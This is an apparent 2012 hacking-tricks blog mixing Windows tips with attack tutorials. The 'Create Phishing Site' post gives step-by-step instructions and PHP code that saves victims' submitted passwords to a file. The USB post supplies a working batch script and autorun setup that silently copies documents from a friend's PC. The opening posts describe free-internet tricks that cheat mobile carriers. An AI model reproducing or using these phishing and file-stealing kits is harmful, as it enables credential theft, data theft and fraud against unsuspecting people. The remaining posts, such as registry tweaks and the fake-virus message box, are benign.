
Monday, 23 January 2012

Free Relance 2G/3G internet

Before this I have shared AirtelFree gprs trick for 2g and 3g as Airtel is a best ISP in broadband and phone deals in India as it offers best broadband services likes sky mobile broadband to its users  but before some days it gone ban by airtel and readers was demanding to have any other. so here is a new trick for free reliance 2G/3G gprs.


  1. Deactive all Gprs Services.
  2. Make Sure You have Default rcomnet settings.
  3. Make Sure your belance is less then 1 rs.
  4. Dial *123*099# From Your mobile.
  5. Now You will got message from reliance and get free 2.5gb internet belance for free.

Steps To Hack Reliance For Free Internet :-
·         First of all make your balance zero
·         Connect internet using following settings.
Dial No
·         Then you have to set ip :- port:- 8080 in your browser.

Stapes [How-To] Configure manually proxy address and port to use free internet on pc

In many free gprs tricks there is a manual setting needed to configure proxy address and port to use free gprs on pc as well as mobile. In Our Previous Trick of Airtel Internet on pc Using Your Freedom there you want to configure manually Port and Proxy Address. some people know how to configure it but some people don’t know how to configure it so i am here with step by step by guide with every screen shot to configure manual gprs setting.
For Internet Explorer and Google Chrome Just Follow This Steps
  1. Go to start Then go to Run
  2. Type inetcpl.cpl and click on ok
  3. You Can see The Following Window was appear Click on connection Tab
  4. Now Select You Modem or Device which one you are using to connect the internet
  5. Then Click on Settings
  6. now one new window appear as follow in that just Check on proxy Checkbox
  7. now add proxy server address and port which on you want use And click ok
  8. You Are Done icon smile [How To] Configure manually proxy address and port to use free internet on pc
For Mozila FireFox Just Follow This Steps
  1. Open your Browser
  2. Then Go to Tools And go to Options
  3. Then Go to Advance Tab And Go Network Tab From it. You Can See Following Window
  4. Now Click on Setting.And Check on Manual proxy check box.
  5. Now Add Proxy Address and port Which one You want to use
  6. You Are Done icon smile [How To] Configure manually proxy address and port to use free internet on pc



  1. For Nokia s60 users just create the following gprs Settings on their mobile phoneAPN: rcommms or rcomwap
    Port: 8080
  2. Now Goto
  3. Enter Any web address Which You want to surf so you can surf them easily
  4. You Are Done


  1. TO GET BENIFIT OF THIS TRICK ON PC JUST CONNETCT INTERNET AS ABOVE SETTINGS [ For Help to connect it on pc go up side of this page [How-To] Configure manually proxy address and port to use free internet on pc ]
  2. You can use any proxy site in stand of [ check out our list of  30+Free Proxy Site To Get More BANIFIT OF This trick ]

Free Airtel 2G/3G internet

As you know Airtel is a best ISP in broadband and phone deals in india as it offers best broadband services likes sky mobile broadband to its users. I have already shared manyFree Gprs tricks for airtel, but that is outdated, i mean not working now so today i am here with brand new working airtel free internet tricks which works on 2G as well as 3G network. so go ahead and get the advantages of the hack

Steps To Hack Airtel For Free Internet :-                  
·         First of all crate new profile as apn :- . alternately you can create dialup connection as using you modem by putting following command  +CGDCONT=1,”IP”,”AIRTELMMS.COM” in advance tab of dialup connection property.
·         Then Connect Internet Using It. (It will connect to net and shows you No Network ?Access)
·         Now goto your connection properties then Network Tab and check all check box there.
·         Then Click on Internet Protocol Version (TCP/IP) then goto Properties and select USE THE FOLLOWING DNS SERVER ADDRESSES and enter and DNS server in the box and click on ok
·         Now disconnect your net and reconnect it and see the magic icon smile Most Awaited Airtel 2G 3G Free Gprs/Internet Trick Is Here

(If you have any issue about this post please comment bellow)

Friday, 13 January 2012

Create Phishing Site

Hello Friends

Tired Of Searching For Those Phishing Files

How About Making Your Own Latest Fake Page Of Any Site In Just Few Steps

Here Is The Tutorial

1. First Things First You Must Choose The Site Which You Wanna Make A Phisher From.

2. When You Found Your Site Right Click On It And Say "view source" And Save It On Desktop As index.html

3. Open The "index.htm" With Notepad And Press CTRL+F And Type action. You Should Find A Command Looking Like This
form action="RANDOM URL" method="post"

4.Change The Link After Word Action To write.php And Change The Word Post To Get, Which Is Close To The Word Method

Remember Dont Erase The Inverted Commas And Commas It Might Affect The Page

5. Save index.html

6. Time To Create A Free Website. It MUST SUPPORT .php Files So I Suggest The Use Of Create A Free Website.
This Is Just An Example You Can Find Much More php Supported Sites

7. Login To Your Website And Go To "file manager"

8. Delete The File Thats Already There Called "index.htm" And Upload Your "index.htm" (The One You Just Made)

Note: Put This Symbol < In The Start Of This Code Before ?php

9. Create A New File Called "write.php" And Copy / Paste This:

header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

10. Switch Out The Word "RANDOM" With The Site The Browser Should Go To After Victim Wrote His/Her Password. So It Should Say Like This:
header("Location: ");

You Might Want To Change The Textfile Name So Others Wont Be Able To View The File.

11. Save This File write.php, And Upload It To The Subdomain Aswell

12. Test Out Your Website. Type In Something In Your Phisher And Then Go To Filemanager And Open The Password File, What You Wrote Should Be Typed Here!,


Thursday, 5 January 2012

How to Steal people files using usb drive

I am going to teach you how you can do this from batch file with the help of autorun.inf file.
Let me tell you the basic things what will happen.

When you plug in in your Pen drive, system will look up for autorun.inf (incase if autorun is not disabled for your drive from the system).

Then we’ll input some command in autorun.inf in such a way that it will load the batch file that does the magic of copying all the files from your PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

@echo off
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"


What it actually does is in first case ,CHECK it checks if your removable storage have Copied_files folder or not. If it doesn’t have then it creates one by using MD (Make Directory) command.

Again it checks if you have documents and settings folder then it will assume that you are using windows XP. Other wise it will return an error and exits.

This happens because; in Windows XP the user’s documents are usually stored in %systemroot%\Documents and Settings folder.

Now I’ve defined another two cases after the first case CHECK, that is COPIER case and ERROR case.

Case COPIER will execute when the program recognizes it is Windows XP, where the real coying work goes o.

Case ERROR will execute when the Documents and Settings doesn’t exists in your system root.

This is just a simple use of Batch programming. Copy the above code and paste it in notepad and save it as Filename.bat.

Now let’s create a file that will load it automatically.

Action=File Copier

he above code goes in autorun.inf file. Open notepad and copy it and paste it and save as autorun.inf.

Copy the two files, autorun.inf and Filename.bat in your flash drive.

Then plug in your device to your friends PC and do the evil things.

Where is the flaw?

It shows Command prompt window and process of copying (thank god your noob never think that it actually copying).

Another thing is that it determines the windows by searching the file users and Docuemnts and settings, which is not the right way to determine your system operating system.

However this is just an educational tutorial.

Hope this tutorial was helpful.

(If you have any issue or suggestion please comment bellow)

Improve Windows-XP Shutdown Speed

This tweak reduces the time Windows-XP waits before automatically closing any running programs when you give it the command to shutdown.

Follow the steps as given below-

1) Go to Start then select Run 

2) Type 'Regedit' and click ok 

3) Find 'HKEY_CURRENT_USER\Control Panel\Desktop\' 

4) Select 'WaitToKillAppTimeout' 

5) Right click and select 'Modify' 

6) Change the value to '1000' 

7) Click 'OK' 

8) Now select 'HungAppTimeout' 

9) Right click and select 'Modify' 

10) Change the value to '1000' 

11) Click 'OK' 

(If you have any issue or suggestion please comment bellow) 

Convert FAT - NTFS

To convert a FAT partition to NTFS, perform the following steps. 

1) Open 'Command Prompt'. 

2) At the command prompt, type the following- 

CONVERT [driveletter]: /FS:NTFS. 

'Convert.exe' will attempt to convert the partition to NTFS. 

NOTE :- Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. 

(If you have any issue or suggestion please comment bellow)

Free Airtel Gprs on Mobile

Now you have have activated your Airtel Live and opera mini browner.

Now change the follow the instruction to configure your Airtel Live setting to surf freely

For s60 users:

Create a new access point and setAccess Point as airtelgprs.comProxy address= 80 (Remember its 80 not 8080)

Just try it on your mobile and share your feeback with us.

(If you have any issue or suggestion please comment bellow)

Remove shortcut arrow from desktop icons completely

To remove shortcut arrow from desktop icons in any type of document:
a) Perform instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are reported here.
b) Perform instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are reported here.
c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.
So, here is a summary of all actions:

1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT\lnkfile
3. Delete the IsShortcut registry value.

4. Navigate to HKEY_CLASSES_ROOT\piffile
5. Delete the IsShortcut registry value.

6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
7. Delete the IsShortcut registry value.
8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
9. Delete the IsShortcut registry value.
10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut
11. Delete the IsShortcut registry value.
12. Navigate to HKEY_CLASSES_ROOT\WSHFile
13. Delete the IsShortcut registry value.
14. Close regedit.
Logoff and… Enjoy!
Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.

(If you have any issue or suggestion please comment bellow)

Create Folders And Files With NO! Name

This trick will allow you to create files and folders without any name.

Just follow the steps as given below :-

1) Select any file or folder.

2) Right click on it, select 'Rename' or simply press 'F2'.

3) Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad.

Note :- Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard.
Don’t type the numbers which are present on top of the character keys.

4) Press Enter and the nameless file or folder will be created.

Reason :- The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?
For this you will have to rename the file with 2 spaces.
Just follow the steps given below :-

1) Select file, Press 'F2'.

2) Hold 'Alt' key and type '0160' from the numpad.

3) Release the 'Alt' key. Now without doing anything else, again hold 'Alt' key and type '0160'.

4) Press 'Enter' and you will have second nameless file in the same directory.

5) Repeat step 3 to create as many nameless files or folders in the same directory.

To hide this folder 
1) Right click on it and go to the properties,
2) Go to Customize
3) Change icon
4) Choose blank icon.
And you done.....

(We have a problem with deleting these folders, to do so, start your computer in 'Safe Mode' and delete it from there.) 

(If you have any issue or suggestion please comment bellow)

Disable Error Report In Windows

Microsoft’s Error Reporting in windows sometimes is disturbing, most of us don’t want to send that error report because it’s of no use.
There’s an easy way to disable Microsoft error report in windows.

Disable Microsoft Error report in Windows XP :
1) Open Control Panel (Start > Control Panel)
2) Open the Problem Reports & Solutions applet Under advanced options and disable error reporting.

Disable Microsoft Error report in Windows Vista :
1) Right click on my computer (Desktop) and click properties
2) Click the Advanced Tab
3) You’ll see a “Error reporting” button at the bottom, click it
4) Select Disable Error Reporting.
And you’re done….!
(If you have any issue or suggestion about this post please comment bellow)

-: Hide Entire Drives Partition Without Registry :-

Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.

1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.


2) Then type "list volume"
The result will look something like one as shown below-

3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}

4) Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }

sometime it requires to reboot the computer.
Diskpart will remove the letter.

Windows XP is not having capabilty to identify the unknown volume.
Your Data is now safe from unauthorised users.

To access the content of hidden Drive....

1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.


2) Then type "list volume"
The result will look something like one as shown below-

3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}

4) Now type "assign letter E"
Now a message will come { Diskpart Assign the Drive letter }


right click on my computer on desktop go to Manage click on disk management now right

click on ur partation which u want to hide and click change drive letter and paths n remove 

the letter

(If you have any issue or suggestion please comment bellow)

Reveal *****(Asterisk) Passwords Using Javascript

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. 

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

Note :- This trick may not be working with firefox. 

(If you have any issue or suggestion please comment bellow)

Create a Fake Virus using Notepad!

There are times where you would want to fool your friend by having a virus in your computer, but actually, it’s just a regular message box. Well, you’re able to do it, using a small code in Notepad that can make it all happen. This is what your final result should be :

Here’s the steps on creating a fake error message box. First off, open Notepad and type this code in:

X=MsgBox("Message Description",0+16,"Title")

This code is basically telling the computer that when the following script is opened, it will display a fake error message box with the title as “Title” and the description as “Message Description”. But those can be changed so if you want to type a different title or description, go ahead
This is a Visual Basic Code, which means you are able to type in Visual Basic Scripts using Notepad! So anyways, the numbers in that code can be changed.
Let me explain you the code:
X=MsgBox("Message Description",0+16,"Title")

Message Description: Write some warning message you want to display (In above image the description is “you have a virus. iNiyant has killed your computer. Your welcome” )
0+16: It is a combination of two different codes:
–you can write any numbers from 0,1,2,3,4 instead of 0 (before the ‘+’ symbol) & here is the meaning of each number:

0 = Ok Button
1 = Ok/Cancel Button
2 = Abort/Retry/Ignore button
3 = Yes/No/Cancel
4 = Yes/No
–you can write any numbers from 16,32,48,64 instead of 16 (after the  ‘+’ symbol) & here is the meaning of each number:

16 – Critical Icon
32 – Warning Icon
48 – Warning Message Icon
64 – Information Icon
Title: you can write any title (in above image the title is “Virus Detected”)

To create multiple Message Boxes, just duplicate the line so that it could end up to something like this in the message:
X=MsgBox("Message Description",0+16,"Title") X=MsgBox("Message Description",0+16,"Title")

Now at the end you are going to go to ‘Save As’ and here’s the important step. The file-type should be set to ‘All types’ and the extension of your filename should be .VBS. For example, “Fake virus.vbs”. Once you save it, open it up and you should get your message box opened up. But i would not call this a really successful prank because changing the icon of the shortcut is rather difficult while you will need to get third-party programs and edit it from there itself. The following was done in Windows 7 Ultimate and will also work in Windows XP and Windows Vista.
That’s all there is to it!

(If you have any issue or suggestion please comment bellow)